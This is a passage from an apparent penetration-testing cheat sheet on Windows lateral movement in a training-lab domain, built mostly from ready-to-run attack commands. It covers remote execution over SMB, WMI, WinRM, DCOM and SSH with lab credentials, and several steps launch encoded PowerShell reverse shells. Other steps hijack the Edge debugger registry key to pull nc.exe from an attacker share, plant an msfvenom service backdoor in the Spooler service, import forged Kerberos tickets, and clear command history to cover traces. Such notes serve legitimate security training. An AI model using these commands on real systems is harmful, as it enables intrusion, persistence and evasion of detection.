<li>Use <a href="https://github.com/0xthirteen/CleanRunMRU">CleanRunMRU</a> to clean all command records:<ol>
<li>Get the tool: <code>wget -Uri http://10.10.14.207/CleanRunMRU/CleanRunMRU/Program.cs -OutFile CleanRunMRU.cs</code></li>
<li>Use csc.exe to compile it: <code>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\CleanRunMRU.cs</code></li>
<li>Use CleanRunMRU.exe to clear all commands: <code>.\CleanRunMRU.exe  clearall</code></li>
</ol>
</li>
</ol>
<h2 id="server-message-block-smb"><strong>Server Message Block (SMB)</strong></h2>
<ol>
<li>SMB Enumeration: <code>proxychains4 -q nmap 172.20.0.52 -sV -sC -p139,445 -Pn</code></li>
<li>Use PsExec to connect to a remote host and execute commands interactivelly: <code>.\PsExec.exe \\SRV02 -i -u INLANEFREIGHT\helen -p RedRiot88 cmd</code></li>
<li>To execute our payload as NT AUTHORITY\SYSTEM, we need to specify the option -s which means that it will run with SYSTEM privileges: <code>.\PsExec.exe \\SRV02 -i -s -u INLANEFREIGHT\helen -p RedRiot88 cmd</code></li>
<li>Perform lateral movement with SharpNoPSExec:<ol>
<li>Start listening with Netcat: <code>nc -lnvp 8080</code></li>
<li>Generate the reverse shell payload using https://www.revshells.com or our fother C2.</li>
<li>Run SharpNoPSExec<code>.\SharpNoPSExec.exe --target=172.20.0.52 --payload="c:\windows\system32\cmd.exe /c powershell -exec bypass -nop -e ...SNIP...AbwBzAGUAKAApAA=="</code></li>
</ol>
</li>
<li>Nimexec works simillary to SharpNoPSExec:<ol>
<li>Start listening with Netcat: <code>nc -lnvp 8080</code></li>
<li>Generate the reverse shell payload using revshells.com, and to convert the plain text password to NTLM hash, we can use this recipe in CyberChef: <code>.\NimExec -u helen -d inlanefreight.local -p RedRiot88 -t 172.20.0.52 -c "cmd.exe /c powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==" -v</code></li>
</ol>
</li>
<li>Reg.exe: <ol>
<li>Set up an SMB server to host our payload: <code>sudo python3 smbserver.py share -smb2support /home/plaintext/nc.exe</code></li>
<li>Execute our Netcat listener: <code>nc -lnvp 8080</code></li>
<li>Execute reg.exe to add a new registry key to Microsoft Edge (msedge.exe): <code>reg.exe add "\\srv02.inlanefreight.local\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t reg_sz /d "cmd /c copy \\172.20.0.99\share\nc.exe &amp;&amp; nc.exe -e \windows\system32\cmd.exe 172.20.0.99 8080"</code></li>
<li>Once Microsoft Edge is opened by any user in the domain, we will instantly get a reverse shell.</li>
<li>It is important to keep in mind that to use SMB share folder without authentication we need to have the following registry key set to 1: <code>reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth</code></li>
<li>If have an account with administrative rights, we can use the following command to allow insecure guest authentication: <code>reg.exe add HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v AllowInsecureGuestAuth /d 1 /t REG_DWORD /f</code></li>
</ol>
</li>
<li>Use psexec.py to get remote code execution on a target host, administrator login credentials are required: <code>proxychains4 -q psexec.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52</code></li>
<li>The smbexec.py method leverages the built-in Windows SMB functionality to run arbitrary commands on a remote system without uploading files, making it a quieter alternative: <code>proxychains4 -q smbexec.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52</code></li>
<li>The services.py script in Impacket interacts with Windows services using the MSRPC interface: <code>proxychains4 -q services.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 list</code><ol>
<li>Use the Metasploit output option exe-service, which creates a service binary: <code>msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.207 LPORT=9001 -f exe-service -o rshell-9001s.exe</code></li>
<li>Execute the command to create a new service: <code>proxychains4 -q services.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 create -name 'Service Backdoor' -display 'Service Backdoor' -path "\\\\10.10.14.207\\share\\rshell-9001.exe"</code></li>
<li>Ensure that the SMB server has the file that will be executed: <code>sudo smbserver.py share -smb2support ./</code></li>
<li>Run our Netcat listener: <code>nc -lnvp 8080</code></li>
<li>View the configuration of the custom command created using config -name <serviceName>: <code>proxychains4 -q services.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name 'Service Backdoor'</code></li>
<li>Cover up the traces and delete the service by typing delete -name <serviceName>: <code>proxychains4 -q services.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 delete -name 'Service Backdoor'</code></li>
<li>Alternatively, we use services.py to modify existing services: <ol>
<li><code>proxychains4 -q impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name Spooler</code></li>
<li>Modify the binary path to our payload and set the START_TYPE to AUTO START with the option -start_type 2: <code>proxychains4 -q impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 change -name Spooler -path "\\\\10.10.14.207\\share\\rshell-9001.exe" -start_type 2</code></li>
<li>Start the service and wait for our command execution: <code>proxychains4 -q impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name Spooler</code></li>
</ol>
</li>
</ol>
</li>
<li>The atexec.py script utilizes the Windows Task Scheduler service, which is accessible through the atsvc SMB pipe:<ol>
<li>Start a Netcat listener: <code>nc -lnvp 8080</code></li>
<li>Pass the domain name, administrator user, password, and target IP address <domain>/<user>:<password>@<ip>, and lastly, we can pass our reverse shell payload to get executed. We can generate the reverse shell payload using revshells.com: <code>proxychains4 -q atexec.py INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 "powershell -e ...SNIP...AbwBzAGUAKAApAA=="</code></li>
</ol>
</li>
</ol>
<h2 id="windows-management-instrumentation-wmi"><strong>Windows Management Instrumentation (WMI)</strong></h2>
<ol>
<li>WMI Enumeration: <code>nmap -p135,49152-65535 10.129.229.244 -sV</code></li>
<li>To test credentials againts WMI we will use NetExec: <code>netexec wmi 10.129.229.244 -u helen -p RedRiot88</code></li>
<li>To retrieve detailed information about the operating system from a remote computer: <code>wmic /node:172.20.0.52 os get Caption,CSDVersion,OSArchitecture,Version</code></li>
<li>Perform the same action using PowerShell:: <code>Get-WmiObject -Class Win32_OperatingSystem -ComputerName 172.20.0.52 | Select-Object Caption, CSDVersion, OSArchitecture, Version</code></li>
<li>Using WMIC to create a new process on a remote machine: <code>wmic /node:172.20.0.52 process call create "notepad.exe"</code></li>
<li>The same task can be accomplished using PowerShell: <code>Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName 172.20.0.52</code></li>
<li>Specify credentials to within wmic or PowerShell:<ol>
<li><code>wmic /user:username /password:password /node:172.20.0.52 os get Caption,CSDVersion,OSArchitecture,Version</code></li>
<li><code>$credential = New-Object System.Management.Automation.PSCredential("username", (ConvertTo-SecureString "password" -AsPlainText -Force));</code></li>
</ol>
</li>
<li>Lateral Movement From Linux:<ol>
<li>Install: <code>sudo apt-get install wmi-client</code></li>
<li>Run queries against a remote Windows machine: <code>wmic -U inlanefreight.local/helen%RedRiot88 //172.20.0.52 "SELECT Caption, CSDVersion, OSArchitecture, Version FROM Win32_OperatingSystem"</code></li>
<li>Impacket includes the built-in script wmiexec.py for executing commands using WMI. Keep in mind that wmiexec.py uses port 445 to retreive the output of the command and if port 445 is blocked, it won't work: <code>wmiexec.py inlanefreight/helen:RedRiot88@172.20.0.52 whoami</code></li>
<li>Use NetExec to run WMI queries or execute commands using WMI: <code>proxychains4 -q netexec wmi 172.20.0.52 -u helen -p RedRiot88 --wmi "SELECT * FROM Win32_OperatingSystem"</code></li>
<li>To execute commands we can use the protocol wmi with the option -x <COMMAND>: <code>proxychains4 -q netexec wmi 172.20.0.52 -u helen -p RedRiot88 -x whoami</code></li>
</ol>
</li>
</ol>
<h2 id="windows-remote-management-winrm"><strong>Windows Remote Management (WinRM)</strong></h2>
<ol>
<li>Nmap scan: <code>nmap -p5985,5986 10.129.229.244 -sCV</code></li>
<li>To test credentials use NetExec: <code>netexec winrm 10.129.229.244 -u frewdy -p Kiosko093</code></li>
</ol>
<h4 id="lateral-movement-from-windows"><strong>Lateral Movement From Windows:</strong></h4>
<ol>
<li>Use Invoke-Command to execute commands on a remote system: <code>Invoke-Command -ComputerName srv02 -ScriptBlock { hostname;whoami }</code></li>
<li>Specify credentials with the -Credential parameter:<ol>
<li><code>$username = "INLANEFREIGHT\Helen"</code></li>
<li><code>$password = "RedRiot88"</code></li>
<li><code>$securePassword = ConvertTo-SecureString $password -AsPlainText -Force</code></li>
<li><code>$credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)</code></li>
<li><code>nvoke-Command -ComputerName 172.20.0.52 -Credential $credential -ScriptBlock { whoami; hostname }</code></li>
</ol>
</li>
<li>winrs (Windows Remote Shell) is a command line tool allowing to execute commands on a Windows machine using WinRM remotely: <code>winrs -r:srv02 "powershell -c whoami;hostname"</code></li>
<li>winrs also allow us to use explicit credentials with the options /username:<username> and /password:<password> as follow: <code>winrs /remote:srv02 /username:helen /password:RedRiot88 "powershell -c whoami;hostname"</code></li>
<li>Copy files using a PowerShell session:<ol>
<li><code>$sessionSRV02 = New-PSSession -ComputerName SRV02 -Credential $credential</code></li>
<li>Copy a file to the target machine: <code>Copy-Item -ToSession $sessionSRV02 -Path 'C:\Users\helen\Desktop\Sample.txt' -Destination 'C:\Users\helen\Desktop\Sample.txt' -Verbose</code></li>
<li>Copy a file from the target machine: <code>Copy-Item -FromSession $sessionSRV02 -Path 'C:\Windows\System32\drivers\etc\hosts' -Destination 'C:\Users\helen\Desktop\host.txt' -Verbose</code></li>
</ol>
</li>
<li>Use the Enter-PSSession cmdlet for an interactive shell using PowerShell remoting: <code>Enter-PSSession $sessionSRV02</code></li>
<li>Use kerberos tickets to connect to PowerShell remoting: <ol>
<li>First we need to forge our TGT: <code>.\Rubeus.exe asktgt /user:leonvqz /rc4:32323DS033D176ABAAF6BEAA0AA681400 /nowrap</code></li>
<li>Create a sacrificial process with the option createnetonly: <code>.\Rubeus.exe createnetonly /program:powershell.exe /show</code></li>
<li>Import the TGT of the account we want to use: <code>.\Rubeus.exe ptt /ticket:doIFsjCCBa6gAwIBBaEDAgEWooIEszCCBK9h...SNIP...</code></li>
<li>Use this session to connect to the target machine: <code>Enter-PSSession SRV02.inlanefreight.local -Authentication Negotiate</code></li>
</ol>
</li>
</ol>
<h4 id="lateral-movement-from-linux"><strong>Lateral Movement From Linux</strong></h4>
<ol>
<li>With NetExec we can use the option -x or -X to execute CMD or PowerShell commands: <code>netexec winrm 10.129.229.244 -u frewdy -p Kiosko093 -x "ipconfig"</code></li>
<li>Use evil-winrm to connect to a remote Windows machine and execute commands: <code>evil-winrm -i 10.129.229.244 -u 'inlanefreight.local\frewdy' -p Kiosko093</code></li>
<li>Evil-WinRM allows us to load PowerShell scripts: <code>evil-winrm -i 10.129.229.244 -u 'inlanefreight.local\frewdy' -p Kiosko093 -s '/home/plaintext/'</code></li>
</ol>
<h3 id="windows-powershell-web-access"><strong>Windows PowerShell Web Access</strong></h3>
<ol>
<li><strong>By default the URL path for PowerShell Web Access is <code>/pswa</code> and the port will be 80 or 443. The web directory and port can be changed.</strong></li>
</ol>
<h2 id="distributed-component-object-model-dcom"><strong>Distributed Component Object Model (DCOM)</strong></h2>
<ol>
<li>Nmap scan: <code>nmap -p135,49152-65535 10.129.229.244 -sCV -Pn</code></li>
<li>The MMC20.Application object allows remote interaction with Microsoft Management Console (MMC), enabling us to execute commands and manage administrative tasks on a Windows system through its graphical user interface components:<ol>
<li><code>nc -lnvp 8001</code></li>
<li><code>$mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","172.20.0.52"));</code></li>
<li><code>$mmc.Document.ActiveView.ExecuteShellCommand("powershell.exe",$null,"-e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==",0)</code></li>
</ol>
</li>
<li>ShellWindows &amp; ShellBrowserWindow:<ol>
<li>Find the CLSID with the following script: <code>Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID' | ForEach-Object{Get-ItemProperty -Path $_.PSPath | Where-Object {$_.'(default)' -eq 'ShellWindows'} | Select-Object -ExpandProperty PSChildName}</code></li>
<li><code>$shell = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","SRV02"))</code></li>
<li><code>$shell = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","172.20.0.52"))</code></li>
<li><code>nc -lnvp 8080</code></li>
<li>Use a PowerShell reverse shell payload from revshells.com: <code>$shell[0].Document.Application.ShellExecute("cmd.exe","/c powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==","C:\Windows\System32",$null,0)</code></li>
</ol>
</li>
<li>dcomexec.py:<ol>
<li><code>nc -lnvp 8080</code></li>
<li><code>proxychains4 -q python3 dcomexec.py -object MMC20 INLANEFREIGHT/Josias:Jonny25@172.20.0.52 "powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==" -silentcommand</code></li>
</ol>
</li>
</ol>
<h2 id="secure-shell-ssh"><strong>Secure Shell (SSH)</strong></h2>
<ol>
<li>Scan: <code>nmap 10.129.229.244 -p 22 -sCV -Pn</code></li>
<li>Test credentials using netexec: <code>netexec ssh 10.129.229.244 -u ambioris -p Ward@do9049</code></li>
<li><code>ssh Ambioris@10.129.229.244</code></li>
<li><code>ssh ambioris@srv01</code></li>
<li><code>ssh -i C:\helen_id_rsa -l helen@inlanefreight.local -p 22 SRV01</code></li>
<li><code>icacls.exe C:\helen_id_rsa</code></li>
<li><code>copy C:\helen_id_rsa C:\Users\Ambioris\</code></li>
<li><code>icacls helen_id_rsa</code></li>
<li><code>ssh -i C:\helen_id_rsa -l helen@inlanefreight.local -p 22 SRV01</code></li>
</ol>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "../..", "features": [], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../../assets/javascripts/bundle.d6f25eb3.min.js"></script>
      
    
  </body>
</html>